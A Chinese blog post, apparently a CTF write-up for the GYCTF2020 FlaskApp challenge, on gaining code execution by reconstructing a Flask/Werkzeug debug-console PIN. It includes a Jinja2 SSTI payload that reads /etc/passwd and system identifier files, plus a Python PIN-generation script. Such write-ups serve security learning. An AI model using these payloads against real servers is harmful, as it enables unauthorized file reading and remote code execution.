[GYCTF2020]FlaskApp--Flask Debug PIN

31 篇文章 3 订阅
8 篇文章 0 订阅

一.前言

已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN码的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来算了。

二.正文

​​​​​​​​​​​​首先,打开题目,来看这个页面
在这里插入图片描述
测试的过程我就不说了,关键是要触发这个程序的报错,使其进入debug页面。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Cd0ERYCZ-1638344677443)(C:\Users\薛安\AppData\Roaming\Typora\typora-user-images\image-20211130161316605.png)]
我们尝试进入python shell但是flask的debug页面进入python shell是需要pin码的,所以这就带来一个问题,flask的pin码是怎么生成的?详情请大家来看https://zhuanlan.zhihu.com/p/32336971这篇文章,这篇文章说的很详细。
在这里插入图片描述
总之,这个pin码的生成取决于下面这几个因素:

1.服务器运行flask所登录的用户名。
2.modname
2.getattr(app, “name”, app.class.name)。
3.flask库下app.py的绝对路径。
4.当前网络的mac地址的十进制数。通过文件/sys/class/net/eth0/address获得
5.最后一个就是机器的id。
其中modname就是flask.app,getattr(app, “name”, app.class.name)就是Flask这两个一般是不会变的,app.py的绝对路径我们可以直接从它的报错信息中得知。所以,一同分析下来我们只剩用户名,机器id,mac地址
我们在之前的文章中曾经做过这道题,这里面存在SSTI漏洞,我们可以通过SSTI漏洞来获取所有的组件,最后通过脚本生成PIN。
我们用下面的payload来读取用户名。

{% for c in [].__class__.__mro__[-1].__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/etc/passwd','r').read()}}{% endif %}{% endfor %}

请添加图片描述
其中的用户名是flaskweb。
我们用上面的payload稍加改动,将其中读文件的部分改成/sys/class/net/eth0/address,就可以读取机器的MAC地址了。
在这里插入图片描述
还剩下一个机器的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,而docker的id在/proc/self/cgroup,所以像上面那样改一下payload就能用。
在这里插入图片描述
我们用一下大佬写的脚本来生成payload。脚本来源

#!/usr/bin/python2.7
#coding:utf-8

from sys import *
import requests
import re
from itertools import chain
import hashlib

def genpin(mac,mid):

    probably_public_bits = [
        'flaskweb', # username
        'flask.app', # 一般为固定值modname
        'Flask', # getattr(app, '__name__', getattr(app.__class__, '__name__'))
        '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
    ]
    mac = "0x"+mac.replace(":","")
    mac = int(mac,16)
    private_bits = [
        str(mac), # str(uuid.getnode()),  /sys/class/net/eth0/address
        str(mid) # get_machine_id(), /proc/sys/kernel/random/boot_id
    ]

    h = hashlib.md5()
    for bit in chain(probably_public_bits, private_bits):
        if not bit:
            continue
        if isinstance(bit, str):
            bit = bit.encode('utf-8')
        h.update(bit)
    h.update(b'cookiesalt')

    num = None
    if num is None:
        h.update(b'pinsalt')
        num = ('%09d' % int(h.hexdigest(), 16))[:9]

    rv =None
    if rv is None:
        for group_size in 5, 4, 3:
            if len(num) % group_size == 0:
                rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                            for x in range(0, len(num), group_size))
                break
        else:
            rv = num

    return rv

def getcode(content):
    try:
        return re.findall(r"<pre>([\s\S]*)</pre>",content)[0].split()[0]
    except:
        return ''
def getshell():
    print (genpin("02:42:ac:10:af:ca","b53170cd20be5202463fa5e0a54ea66fbeb1f2c058dcb09e105767cfc41acba4"))

if __name__ == '__main__':
    getshell()

运行结果如下
在这里插入图片描述
我们输入PIN码就可以用pythonshell了。
接下来就是执行命令了。
在这里插入图片描述
cat flag
在这里插入图片描述

后记

最近不知道为什么,我的笔记本在CSDN上传不了图片了,只能用台式机来写了,不知道是什么问题,希望以后能解决这个问题吧。

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值